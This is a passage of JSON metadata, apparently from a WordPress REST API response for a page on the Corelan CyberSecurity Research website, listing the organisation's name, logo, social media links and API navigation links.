engineering and security tooling used by professionals worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]}]}},"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/pages\/15026","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=15026"}],"version-history":[{"count":1,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/pages\/15026\/revisions"}],"predecessor-version":[{"id":15027,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/pages\/15026\/revisions\/15027"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=15026"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}